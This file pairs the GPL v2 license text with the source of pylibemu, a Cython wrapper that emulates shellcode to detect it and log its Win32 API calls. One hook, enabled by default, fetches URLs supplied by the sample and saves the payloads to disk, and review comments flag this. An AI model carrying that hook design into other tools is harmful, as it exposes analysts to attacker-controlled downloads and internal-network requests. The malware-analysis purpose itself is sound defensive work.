33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must give the recipients all the rights that 36 | you have. You must make sure that they, too, receive or can get the 37 | source code. And you must show them these terms so they know their 38 | rights. 39 | 40 | We protect your rights with two steps: (1) copyright the software, and 41 | (2) offer you this license which gives you legal permission to copy, 42 | distribute and/or modify the software. 43 | 44 | Also, for each author's protection and ours, we want to make certain 45 | that everyone understands that there is no warranty for this free 46 | software. If the software is modified by someone else and passed on, we 47 | want its recipients to know that what they have is not the original, so 48 | that any problems introduced by others will not reflect on the original 49 | authors' reputations. 50 | 51 | Finally, any free program is threatened constantly by software 52 | patents. We wish to avoid the danger that redistributors of a free 53 | program will individually obtain patent licenses, in effect making the 54 | program proprietary. To prevent this, we have made it clear that any 55 | patent must be licensed for everyone's free use or not licensed at all. 56 | 57 | The precise terms and conditions for copying, distribution and 58 | modification follow. 59 | 60 | GNU GENERAL PUBLIC LICENSE 61 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 62 | 63 | 0. This License applies to any program or other work which contains 64 | a notice placed by the copyright holder saying it may be distributed 65 | under the terms of this General Public License. 
The "Program", below, 66 | refers to any such program or work, and a "work based on the Program" 67 | means either the Program or any derivative work under copyright law: 68 | that is to say, a work containing the Program or a portion of it, 69 | either verbatim or with modifications and/or translated into another 70 | language. (Hereinafter, translation is included without limitation in 71 | the term "modification".) Each licensee is addressed as "you". 72 | 73 | Activities other than copying, distribution and modification are not 74 | covered by this License; they are outside its scope. The act of 75 | running the Program is not restricted, and the output from the Program 76 | is covered only if its contents constitute a work based on the 77 | Program (independent of having been made by running the Program). 78 | Whether that is true depends on what the Program does. 79 | 80 | 1. You may copy and distribute verbatim copies of the Program's 81 | source code as you receive it, in any medium, provided that you 82 | conspicuously and appropriately publish on each copy an appropriate 83 | copyright notice and disclaimer of warranty; keep intact all the 84 | notices that refer to this License and to the absence of any warranty; 85 | and give any other recipients of the Program a copy of this License 86 | along with the Program. 87 | 88 | You may charge a fee for the physical act of transferring a copy, and 89 | you may at your option offer warranty protection in exchange for a fee. 90 | 91 | 2. You may modify your copy or copies of the Program or any portion 92 | of it, thus forming a work based on the Program, and copy and 93 | distribute such modifications or work under the terms of Section 1 94 | above, provided that you also meet all of these conditions: 95 | 96 | a) You must cause the modified files to carry prominent notices 97 | stating that you changed the files and the date of any change. 
98 | 99 | b) You must cause any work that you distribute or publish, that in 100 | whole or in part contains or is derived from the Program or any 101 | part thereof, to be licensed as a whole at no charge to all third 102 | parties under the terms of this License. 103 | 104 | c) If the modified program normally reads commands interactively 105 | when run, you must cause it, when started running for such 106 | interactive use in the most ordinary way, to print or display an 107 | announcement including an appropriate copyright notice and a 108 | notice that there is no warranty (or else, saying that you provide 109 | a warranty) and that users may redistribute the program under 110 | these conditions, and telling the user how to view a copy of this 111 | License. (Exception: if the Program itself is interactive but 112 | does not normally print such an announcement, your work based on 113 | the Program is not required to print an announcement.) 114 | 115 | These requirements apply to the modified work as a whole. If 116 | identifiable sections of that work are not derived from the Program, 117 | and can be reasonably considered independent and separate works in 118 | themselves, then this License, and its terms, do not apply to those 119 | sections when you distribute them as separate works. But when you 120 | distribute the same sections as part of a whole which is a work based 121 | on the Program, the distribution of the whole must be on the terms of 122 | this License, whose permissions for other licensees extend to the 123 | entire whole, and thus to each and every part regardless of who wrote it. 124 | 125 | Thus, it is not the intent of this section to claim rights or contest 126 | your rights to work written entirely by you; rather, the intent is to 127 | exercise the right to control the distribution of derivative or 128 | collective works based on the Program. 
129 | 130 | In addition, mere aggregation of another work not based on the Program 131 | with the Program (or with a work based on the Program) on a volume of 132 | a storage or distribution medium does not bring the other work under 133 | the scope of this License. 134 | 135 | 3. You may copy and distribute the Program (or a work based on it, 136 | under Section 2) in object code or executable form under the terms of 137 | Sections 1 and 2 above provided that you also do one of the following: 138 | 139 | a) Accompany it with the complete corresponding machine-readable 140 | source code, which must be distributed under the terms of Sections 141 | 1 and 2 above on a medium customarily used for software interchange; or, 142 | 143 | b) Accompany it with a written offer, valid for at least three 144 | years, to give any third party, for a charge no more than your 145 | cost of physically performing source distribution, a complete 146 | machine-readable copy of the corresponding source code, to be 147 | distributed under the terms of Sections 1 and 2 above on a medium 148 | customarily used for software interchange; or, 149 | 150 | c) Accompany it with the information you received as to the offer 151 | to distribute corresponding source code. (This alternative is 152 | allowed only for noncommercial distribution and only if you 153 | received the program in object code or executable form with such 154 | an offer, in accord with Subsection b above.) 155 | 156 | The source code for a work means the preferred form of the work for 157 | making modifications to it. For an executable work, complete source 158 | code means all the source code for all modules it contains, plus any 159 | associated interface definition files, plus the scripts used to 160 | control compilation and installation of the executable. 
However, as a 161 | special exception, the source code distributed need not include 162 | anything that is normally distributed (in either source or binary 163 | form) with the major components (compiler, kernel, and so on) of the 164 | operating system on which the executable runs, unless that component 165 | itself accompanies the executable. 166 | 167 | If distribution of executable or object code is made by offering 168 | access to copy from a designated place, then offering equivalent 169 | access to copy the source code from the same place counts as 170 | distribution of the source code, even though third parties are not 171 | compelled to copy the source along with the object code. 172 | 173 | 4. You may not copy, modify, sublicense, or distribute the Program 174 | except as expressly provided under this License. Any attempt 175 | otherwise to copy, modify, sublicense or distribute the Program is 176 | void, and will automatically terminate your rights under this License. 177 | However, parties who have received copies, or rights, from you under 178 | this License will not have their licenses terminated so long as such 179 | parties remain in full compliance. 180 | 181 | 5. You are not required to accept this License, since you have not 182 | signed it. However, nothing else grants you permission to modify or 183 | distribute the Program or its derivative works. These actions are 184 | prohibited by law if you do not accept this License. Therefore, by 185 | modifying or distributing the Program (or any work based on the 186 | Program), you indicate your acceptance of this License to do so, and 187 | all its terms and conditions for copying, distributing or modifying 188 | the Program or works based on it. 189 | 190 | 6. 
Each time you redistribute the Program (or any work based on the 191 | Program), the recipient automatically receives a license from the 192 | original licensor to copy, distribute or modify the Program subject to 193 | these terms and conditions. You may not impose any further 194 | restrictions on the recipients' exercise of the rights granted herein. 195 | You are not responsible for enforcing compliance by third parties to 196 | this License. 197 | 198 | 7. If, as a consequence of a court judgment or allegation of patent 199 | infringement or for any other reason (not limited to patent issues), 200 | conditions are imposed on you (whether by court order, agreement or 201 | otherwise) that contradict the conditions of this License, they do not 202 | excuse you from the conditions of this License. If you cannot 203 | distribute so as to satisfy simultaneously your obligations under this 204 | License and any other pertinent obligations, then as a consequence you 205 | may not distribute the Program at all. For example, if a patent 206 | license would not permit royalty-free redistribution of the Program by 207 | all those who receive copies directly or indirectly through you, then 208 | the only way you could satisfy both it and this License would be to 209 | refrain entirely from distribution of the Program. 210 | 211 | If any portion of this section is held invalid or unenforceable under 212 | any particular circumstance, the balance of the section is intended to 213 | apply and the section as a whole is intended to apply in other 214 | circumstances. 215 | 216 | It is not the purpose of this section to induce you to infringe any 217 | patents or other property right claims or to contest validity of any 218 | such claims; this section has the sole purpose of protecting the 219 | integrity of the free software distribution system, which is 220 | implemented by public license practices. 
Many people have made 221 | generous contributions to the wide range of software distributed 222 | through that system in reliance on consistent application of that 223 | system; it is up to the author/donor to decide if he or she is willing 224 | to distribute software through any other system and a licensee cannot 225 | impose that choice. 226 | 227 | This section is intended to make thoroughly clear what is believed to 228 | be a consequence of the rest of this License. 229 | 230 | 8. If the distribution and/or use of the Program is restricted in 231 | certain countries either by patents or by copyrighted interfaces, the 232 | original copyright holder who places the Program under this License 233 | may add an explicit geographical distribution limitation excluding 234 | those countries, so that distribution is permitted only in or among 235 | countries not thus excluded. In such case, this License incorporates 236 | the limitation as if written in the body of this License. 237 | 238 | 9. The Free Software Foundation may publish revised and/or new versions 239 | of the General Public License from time to time. Such new versions will 240 | be similar in spirit to the present version, but may differ in detail to 241 | address new problems or concerns. 242 | 243 | Each version is given a distinguishing version number. If the Program 244 | specifies a version number of this License which applies to it and "any 245 | later version", you have the option of following the terms and conditions 246 | either of that version or of any later version published by the Free 247 | Software Foundation. If the Program does not specify a version number of 248 | this License, you may choose any version ever published by the Free Software 249 | Foundation. 250 | 251 | 10. If you wish to incorporate parts of the Program into other free 252 | programs whose distribution conditions are different, write to the author 253 | to ask for permission. 
For software which is copyrighted by the Free 254 | Software Foundation, write to the Free Software Foundation; we sometimes 255 | make exceptions for this. Our decision will be guided by the two goals 256 | of preserving the free status of all derivatives of our free software and 257 | of promoting the sharing and reuse of software generally. 258 | 259 | NO WARRANTY 260 | 261 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY 262 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN 263 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES 264 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED 265 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF 266 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS 267 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE 268 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, 269 | REPAIR OR CORRECTION. 270 | 271 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 272 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR 273 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, 274 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING 275 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED 276 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY 277 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER 278 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE 279 | POSSIBILITY OF SUCH DAMAGES. 
280 | 281 | END OF TERMS AND CONDITIONS 282 | 283 | Appendix: How to Apply These Terms to Your New Programs 284 | 285 | If you develop a new program, and you want it to be of the greatest 286 | possible use to the public, the best way to achieve this is to make it 287 | free software which everyone can redistribute and change under these terms. 288 | 289 | To do so, attach the following notices to the program. It is safest 290 | to attach them to the start of each source file to most effectively 291 | convey the exclusion of warranty; and each file should have at least 292 | the "copyright" line and a pointer to where the full notice is found. 293 | 294 | 295 | Copyright (C) 19yy 296 | 297 | This program is free software; you can redistribute it and/or modify 298 | it under the terms of the GNU General Public License as published by 299 | the Free Software Foundation; either version 2 of the License, or 300 | (at your option) any later version. 301 | 302 | This program is distributed in the hope that it will be useful, 303 | but WITHOUT ANY WARRANTY; without even the implied warranty of 304 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 305 | GNU General Public License for more details. 306 | 307 | You should have received a copy of the GNU General Public License 308 | along with this program; if not, write to the Free Software 309 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111 USA 310 | 311 | Also add information on how to contact you by electronic and paper mail. 312 | 313 | If the program is interactive, make it output a short notice like this 314 | when it starts in an interactive mode: 315 | 316 | Gnomovision version 69, Copyright (C) 19yy name of author 317 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 318 | This is free software, and you are welcome to redistribute it 319 | under certain conditions; type `show c' for details. 
320 | 321 | The hypothetical commands `show w' and `show c' should show the appropriate 322 | parts of the General Public License. Of course, the commands you use may 323 | be called something other than `show w' and `show c'; they could even be 324 | mouse-clicks or menu items--whatever suits your program. 325 | 326 | You should also get your employer (if you work as a programmer) or your 327 | school, if any, to sign a "copyright disclaimer" for the program, if 328 | necessary. Here is a sample; alter the names: 329 | 330 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program 331 | `Gnomovision' (which makes passes at compilers) written by James Hacker. 332 | 333 | , 1 April 1989 334 | Ty Coon, President of Vice 335 | 336 | This General Public License does not permit incorporating your program into 337 | proprietary programs. If your program is a subroutine library, you may 338 | consider it more useful to permit linking proprietary applications with the 339 | library. If this is what you want to do, use the GNU Library General 340 | Public License instead of this License. 341 | -------------------------------------------------------------------------------- /src/pylibemu.pyx: -------------------------------------------------------------------------------- 1 | # 2 | # pylibemu.pyx 3 | # 4 | # Copyright(c) 2011-2022 Angelo Dell'Aera 5 | # 6 | # This program is free software; you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License version 2 as 8 | # published by the Free Software Foundation. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307 USA

#cython: language_level=3

# C-level declarations (c_emu, c_emu_env, emu_* functions, va_list helpers,
# the render_* and register enums) are pulled in from the companion .pxd.
cimport pylibemu

__version__ = '0.8'

import sys

# Python 2/3 compatibility shim: both branches expose urlopen() as urllib2.
try:
    import urllib.request as urllib2
except ImportError:
    import urllib2

import hashlib
import logging

# NOTE: this runs at import time and configures the process-wide root logger;
# applications embedding pylibemu may prefer to configure logging themselves.
logging.basicConfig(format = '%(asctime)s %(message)s', datefmt = '[%Y-%m-%d %H:%M:%S]')


# export register numbers
# Register indices accepted by Emulator.cpu_reg32_get()/cpu_reg32_set().
# Plain class attributes, not an enum: no validation happens on lookup.
class EMU_REGS:
    eax = 0
    ecx = 1
    edx = 2
    ebx = 3
    esp = 4
    ebp = 5
    esi = 6
    edi = 7


# User hooks
#
# These are registered with libemu through emu_env_w32_export_hook() (see
# Emulator.test) and are invoked by libemu when the emulated code calls the
# corresponding Win32 export. libemu passes the call arguments as C varargs
# after `hook`. All three are declared `noexcept`: a Python exception raised
# inside them cannot propagate to the emulation loop (presumably it is
# printed and swallowed by Cython — confirm against the generated C).

# ExitProcess(uExitCode): reads and discards the exit code, returns 0.
# Emulation stops because Emulator.check_stop_emulation() matches the name.
cdef uint32_t ExitProcess(c_emu_env *env, c_emu_env_hook *hook...) noexcept:
    cdef va_list args
    cdef int _exitcode

    va_start(args, hook)
    _exitcode = va_arg(args, int_type)
    va_end(args)
    return 0

# ExitThread(dwExitCode): same handling as ExitProcess above.
cdef uint32_t ExitThread(c_emu_env *env, c_emu_env_hook *hook...) noexcept:
    cdef va_list args
    cdef int _exitcode

    va_start(args, hook)
    _exitcode = va_arg(args, int_type)
    va_end(args)
    return 0

# URLDownloadToFileA(pCaller, szURL, szFileName, dwReserved, lpfnCB).
#
# Every argument originates from the sample under analysis, so szURL and
# szFileName are hostile input.
#
# NOTE(review): this hook performs a real outbound request from the analysis
# host. urllib fetches whatever URL the sample supplied (no scheme or host
# allow-list, so internal addresses are reachable as well) and the response
# body is written to the current working directory under its MD5 hex digest.
# For a defender that means: the request exposes the analyst's address to the
# sample's infrastructure, and an untrusted payload is dropped on disk (it is
# never executed here). The hook is only registered when the Emulator was
# created with enable_hooks=True (the default); use enable_hooks=False or an
# isolated network for offline analysis.
cdef uint32_t URLDownloadToFile(c_emu_env *env, c_emu_env_hook *hook...) noexcept:
    cdef va_list args
    cdef void *_pCaller
    cdef char *szURL
    cdef char *szFileName
    cdef int _dwReserved
    cdef void *_lpfnCB

    va_start(args, hook)
    _pCaller = va_arg(args, void_ptr_type)
    szURL = va_arg(args, char_ptr_type)
    szFileName = va_arg(args, char_ptr_type)
    _dwReserved = va_arg(args, int_type)
    _lpfnCB = va_arg(args, void_ptr_type)
    va_end(args)

    # NOTE(review): .decode('utf-8') runs outside the try block; a non-UTF-8
    # URL from emulated memory raises UnicodeDecodeError here rather than
    # returning the failure code below.
    logging.warning("Downloading %s (%s)" % (szURL.decode('utf-8'),
                                             szFileName.decode('utf-8')))

    try:
        # 10 s connect/read timeout; the whole body is read into memory with
        # no size cap, and the response object is never closed.
        url = urllib2.urlopen(szURL.decode('utf-8'), timeout = 10)
        content = url.read()
    except Exception:
        # The raw bytes object (not the decoded URL) is interpolated here.
        logging.warning("Error while downloading from %s" % (szURL, ))
        return 0x800C0008 # INET_E_DOWNLOAD_FAILURE

    # MD5 is used only to derive a content-based file name (it is not an
    # integrity check). An existing file with the same digest is overwritten.
    m = hashlib.md5(content)
    with open(str(m.hexdigest()), mode = 'wb') as fd:
        fd.write(content)

    return 0


# Cython compile-time constants.
DEF OUTPUT_SIZE = 1024 * 1024 # 1MB   default size of the profile text buffer
DEF SEP_SIZE = 16                     # number of indentation prefixes (0..15 spaces)
DEF S_SIZE = 4096                     # scratch buffer for one formatted line


# Renders libemu's call profile (the Win32 API calls the sample made, with
# their arguments and return values) into a fixed-size C text buffer.
#
# NOTE(review): this class has no __dealloc__, so `output`, `s` and the
# SEP_SIZE strings in `sep` are never freed; Emulator.new() allocates a new
# instance every time, e.g. on set_output_size().
cdef class EmuProfile:
    cdef char *sep[SEP_SIZE]      # sep[i] is a string of i spaces, built by build_sep()
    cdef char *output             # rendered profile text, output_size bytes, NUL-terminated
    cdef char *t                  # not referenced as self.t anywhere in this file
    cdef char *s                  # scratch buffer (S_SIZE) for one snprintf'd line
    cdef bint truncate            # sticky flag: set once output would overflow, then nothing more is appended
    cdef unsigned long output_size

    # Allocate and zero the output and scratch buffers, then build `sep`.
    def __cinit__(self, size_t output_size):
        self.truncate = False
        self.output_size = output_size

        self.output = malloc(output_size)
        self.s = malloc(S_SIZE)

        self.check_memalloc()
        memset(self.output, 0, output_size)
        memset(self.s , 0, S_SIZE)
        self.build_sep()

    # NOTE(review): sys._exit(-1) terminates the whole host interpreter without
    # cleanup on allocation failure; raising MemoryError would let the embedding
    # application decide.
    cdef check_memalloc(self):
        if self.output is NULL or self.s is NULL:
            logging.warning("Memory allocation error")
            sys._exit(-1)

    # Append `src` to `dst`, where `n` is the total capacity of `dst`.
    # Cython evaluates len() of a char* as strlen(). Once the combined length
    # would exceed n-1 the sticky `truncate` flag is set and this and every
    # later append is silently dropped (exposed via Emulator.emu_profile_truncated).
    cdef concatenate(self, char *dst, char *src, unsigned long n):
        if self.truncate:
            return

        if len(dst) + len(src) > n - 1:
            self.truncate = True
            return

        # strncat's third argument bounds the bytes copied from src, not dst's
        # capacity; this is only safe because of the length check above.
        strncat(dst, src, n)

    # Build sep[i] = i spaces for i in 0..SEP_SIZE-1, each in its own
    # max_len-byte allocation. Callers index sep[] with the nesting depth
    # (`indent`); no caller in this file checks indent < SEP_SIZE, so
    # deeper nesting would read past the array — presumably libemu bounds
    # the depth, confirm.
    cdef build_sep(self):
        cdef char *ssep = ' '
        cdef int counter
        cdef int i
        cdef int max_len

        max_len = len(ssep) * SEP_SIZE + 1

        for i in range(SEP_SIZE):
            counter = i
            t = malloc(max_len)

            if t is NULL:
                logging.warning("Memory allocation error")
                sys._exit(-1)

            memset(t, 0, sizeof(char) * max_len)

            # Append one separator per unit of depth.
            while counter:
                self.concatenate(t, ssep, max_len)
                counter -= 1

            self.sep[i] = t

    # "<return type> <name> (\n"
    cdef log_function_header(self, c_emu_profile_function *function):
        snprintf(self.s,
                 S_SIZE,
                 "%s %s (\n",
                 function.return_value.argtype,
                 function.fnname)

        self.concatenate(self.output, self.s, self.output_size)

    # ")" without a newline; the return-value renderer appends " = ...;\n".
    cdef log_bracket_closed(self):
        cdef char *s = ")"

        self.concatenate(self.output, s, self.output_size)

    cdef log_array_start(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s %s %s = [ \n",
                 self.sep[indent],
                 argument.argtype,
                 argument.argname)

        self.concatenate(self.output, self.s, self.output_size)

    cdef log_array_end(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s ];\n",
                 self.sep[indent])

        self.concatenate(self.output, self.s, self.output_size)

    cdef log_struct_start(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s struct %s %s = {\n",
                 self.sep[indent],
                 argument.argtype,
                 argument.argname)

        self.concatenate(self.output, self.s, self.output_size)

    cdef log_struct_end(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s };\n",
                 self.sep[indent])

        self.concatenate(self.output, self.s, self.output_size)

    # Each render_* method formats one argument line into self.s (bounded by
    # S_SIZE, so over-long strings from the sample are cut, not overflowed)
    # and appends it to the output buffer.
    cdef emu_profile_argument_render_int(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s %s %s = %i;\n",
                 self.sep[indent],
                 argument.argtype,
                 argument.argname,
                 argument.value.tint)

        self.concatenate(self.output, self.s, self.output_size)

    # The string value comes from emulated memory and is written verbatim
    # (quoted, but not escaped) into the profile text.
    cdef emu_profile_argument_render_string(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s %s %s = \"%s\";\n",
                 self.sep[indent],
                 argument.argtype,
                 argument.argname,
                 argument.value.tchar)

        self.concatenate(self.output, self.s, self.output_size)

    # Binary blobs are summarised by size only; their bytes are not rendered.
    cdef emu_profile_argument_render_bytea(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s %s %s = \".binary.\" (%i bytes);\n",
                 self.sep[indent],
                 argument.argtype,
                 argument.argname,
                 argument.value.bytea.size)

        self.concatenate(self.output, self.s, self.output_size)

    # Pointer line; `is_struct` only selects the "struct" prefix. The pointee
    # itself is rendered by the caller (emu_profile_argument_debug).
    cdef emu_profile_argument_render_ptr(self, c_emu_profile_argument *argument, int is_struct, int indent):
        if is_struct:
            snprintf(self.s,
                     S_SIZE,
                     "%s struct %s %s = 0x%x => \n",
                     self.sep[indent],
                     argument.argtype,
                     argument.argname,
                     argument.value.tptr.addr)
        else:
            snprintf(self.s,
                     S_SIZE,
                     "%s %s %s = 0x%x => \n",
                     self.sep[indent],
                     argument.argtype,
                     argument.argname,
                     argument.value.tptr.addr)

        self.concatenate(self.output, self.s, self.output_size)

    # Reinterprets the int value as an in_addr and prints it in dotted form
    # next to the raw integer. inet_ntoa() returns a pointer to a static
    # buffer, which is consumed immediately by the snprintf below.
    cdef emu_profile_argument_render_ip(self, c_emu_profile_argument *argument, int indent):
        cdef c_in_addr *addr
        cdef char *host

        addr = &argument.value.tint
        host = inet_ntoa(addr[0])

        snprintf(self.s,
                 S_SIZE,
                 "%s %s %s = %i (host = %s);\n",
                 self.sep[indent],
                 argument.argtype,
                 argument.argname,
                 argument.value.tint,
                 host)

        self.concatenate(self.output, self.s, self.output_size)

    # Prints the raw value and its ntohs() conversion (network byte order port).
    cdef emu_profile_argument_render_port(self, c_emu_profile_argument *argument, int indent):
        cdef uint16_t port

        port = ntohs(argument.value.tint)

        snprintf(self.s,
                 S_SIZE,
                 "%s %s %s = %i (port = %i);\n",
                 self.sep[indent],
                 argument.argtype,
                 argument.argname,
                 argument.value.tint,
                 port)

        self.concatenate(self.output, self.s, self.output_size)

    cdef emu_profile_argument_render_none(self, c_emu_profile_argument *argument, int indent):
        snprintf(self.s,
                 S_SIZE,
                 "%s none;\n",
                 self.sep[indent])

        self.concatenate(self.output, self.s, self.output_size)

    # Return-value renderers: appended right after log_bracket_closed()'s ")".
    # A void return produces nothing.
    cdef emu_profile_function_render_none(self):
        return

    cdef emu_profile_function_render_int(self, int value):
        snprintf(self.s,
                 S_SIZE,
                 " = 0x%x;\n",
                 value)

        self.concatenate(self.output, self.s, self.output_size)

    # Not called anywhere in this file: emu_profile_function_debug() renders
    # pointer return values through emu_profile_function_render_int() instead.
    cdef emu_profile_function_render_ptr(self, void* ptr):
        snprintf(self.s,
                 S_SIZE,
                 " = 0x%p;\n",
                 ptr)

        self.concatenate(self.output, self.s, self.output_size)

    # Recursive dispatch on argument.render. Structs and arrays render their
    # members one level deeper; pointers render the pointer line and then
    # recurse into the pointee at indent + 1. `indent` grows with nesting and
    # is used unchecked as an index into sep[] (see build_sep).
    cdef emu_profile_argument_debug(self, c_emu_profile_argument *argument, int indent):
        cdef c_emu_profile_argument *argit
        cdef c_emu_profile_argument *argumentit
        cdef int is_struct

        if argument.render == render_struct:
            self.log_struct_start(argument, indent)

            argumentit = emu_profile_arguments_first(argument.value.tstruct.arguments)

            while not emu_profile_arguments_istail(argumentit):
                self.emu_profile_argument_debug(argumentit, indent + 1)
                argumentit = emu_profile_arguments_next(argumentit)

            self.log_struct_end(argument, indent)
            return

        if argument.render == render_array:
            self.log_array_start(argument, indent)

            # Arrays share the struct member list (value.tstruct.arguments).
            argumentit = emu_profile_arguments_first(argument.value.tstruct.arguments)
            while not emu_profile_arguments_istail(argumentit):
                self.emu_profile_argument_debug(argumentit, indent + 1)
                argumentit = emu_profile_arguments_next(argumentit)

            self.log_array_end(argument, indent)
            return

        if argument.render == render_int:
            self.emu_profile_argument_render_int(argument, indent)
            return

        # Shorts are rendered with the int formatter.
        if argument.render == render_short:
            self.emu_profile_argument_render_int(argument, indent)
            return

        if argument.render == render_string:
            self.emu_profile_argument_render_string(argument, indent)
            return

        if argument.render == render_bytea:
            self.emu_profile_argument_render_bytea(argument, indent)
            return

        if argument.render == render_ptr:
            # Follow the pointer chain to its end to decide whether the
            # ultimate pointee is a struct (affects the "struct" prefix only).
            argit = argument

            while argit.render == render_ptr:
                argit = argit.value.tptr.ptr

            is_struct = 0
            if argit.render == render_struct:
                is_struct = 1

            self.emu_profile_argument_render_ptr(argument, is_struct, indent)
            self.emu_profile_argument_debug(argument.value.tptr.ptr, indent + 1)
            return

        if argument.render == render_ip:
            self.emu_profile_argument_render_ip(argument, indent)
            return

        if argument.render == render_port:
            self.emu_profile_argument_render_port(argument, indent)
            return

        if argument.render == render_none:
            self.emu_profile_argument_render_none(argument, indent)
            return

    # Render one recorded call: header, each argument at indent 1, ")" and
    # the return value.
    cdef emu_profile_function_debug(self, c_emu_profile_function *function):
        self.log_function_header(function)

        argument = emu_profile_arguments_first(function.arguments)
        while not emu_profile_arguments_istail(argument):
            self.emu_profile_argument_debug(argument, 1)
            argument = emu_profile_arguments_next(argument)

        self.log_bracket_closed()

        render = function.return_value.render

        if render == render_none:
            self.emu_profile_function_render_none()

        if render == render_int:
            value = function.return_value.value.tint
            self.emu_profile_function_render_int(value)

        # Pointer results are printed as integers (" = 0x%x;\n");
        # emu_profile_function_render_ptr() is not used.
        if render == render_ptr:
            ptr = function.return_value.value.tptr.addr
            self.emu_profile_function_render_int(ptr)

        # Unconditional no-op (render_none emits nothing).
        self.emu_profile_function_render_none()

    # Walk every recorded function in the environment's profile.
    cdef emu_profile_debug(self, c_emu_env *_env):
        function = emu_profile_functions_first(_env.profile.functions)

        while not emu_profile_functions_istail(function):
            self.emu_profile_function_debug(function)
            function = emu_profile_functions_next(function)


# Python-facing wrapper around a libemu x86 emulator instance.
cdef class Emulator:
    cdef c_emu *_emu               # libemu handle; NULL after free()
    cdef EmuProfile emu_profile    # text renderer for the call profile
    cdef int32_t _offset           # last GetPC offset found by shellcode_getpc_test()
    cdef size_t output_size        # capacity passed to EmuProfile
    cdef bint enable_hooks         # whether test() installs the user hooks above

    def __cinit__(self, output_size = OUTPUT_SIZE, enable_hooks = True):
        '''
        Create the emulator.

        @type output_size: Integer
        @param output_size: Size in bytes of the profile output buffer
        @type enable_hooks: Boolean
        @param enable_hooks: Register the ExitProcess/ExitThread/
                             URLDownloadToFileA hooks in `test'. Note that the
                             default (True) enables the URLDownloadToFileA hook,
                             which performs real network requests on behalf of
                             the sample and writes downloaded content to the
                             current directory; pass False for offline analysis.
        '''
        self.output_size = output_size
        self.enable_hooks = enable_hooks
        self.new()

    def __dealloc__(self):
        self.free()

    def free(self):
        '''
        Release the libemu instance (idempotent). The EmuProfile buffers are
        not released here.
        '''
        if self._emu is not NULL:
            emu_free(self._emu)
            self._emu = NULL

    def new(self):
        '''
        Allocate a fresh libemu instance and profile renderer.

        NOTE(review): an existing self._emu is overwritten without being
        freed; callers are expected to call `free' first (as set_output_size
        does).
        '''
        self._emu = emu_new()
        self.emu_profile = EmuProfile(self.output_size)

    def set_output_size(self, output_size):
        '''
        Re-create the emulator with a different profile buffer size. Any
        emulation state is discarded.

        @type output_size: Integer
        @param output_size: New buffer size in bytes
        '''
        self.free()
        self.output_size = output_size
        self.new()

    def shellcode_getpc_test(self, shellcode):
        '''
        GetPC code is code that determines its own location in a process address
        space. It is commonly used in code that needs to reference itself, for
        instance in self-decoding and self-modifying code. This method tries to
        identify GetPC within the shellcode.

        @type shellcode: Binary string
        @param shellcode: Shellcode (a bytes object; the char* coercion below
                          requires it)

        @rtype: Integer
        @return: If GetPC code is successfully identified the offset from the
                 start of the shellcode is returned, otherwise -1.
        '''
        cdef char *buffer

        if self._emu is NULL:
            self.new()

        # `buffer` points into the bytes object, which stays alive for the
        # duration of this call.
        buffer = shellcode
        sclen = len(bytes(shellcode))

        if buffer is NULL:
            return -1

        self._offset = emu_shellcode_test(self._emu, buffer, sclen)
        return self._offset

    def prepare(self, shellcode, offset):
        '''
        Method used to prepare the execution environment. The offset parameter
        value should be determined by the `shellcode_getpc_test method'. If such
        method is not able to identify the GetPC code (thus returning -1) the
        suggested value for offset parameter is 0.

        @type shellcode: Binary string
        @param shellcode: Shellcode
        @type offset  : Integer
        @param offset  : GetPC offset
        '''
        cdef c_emu_cpu *_cpu
        cdef c_emu_memory *_mem
        cdef char *scode
        cdef int j, static_offset

        if self._emu is NULL:
            self.new()

        _cpu = emu_cpu_get(self._emu)
        _mem = emu_memory_get(self._emu)

        # Zero the eight 32-bit general purpose registers.
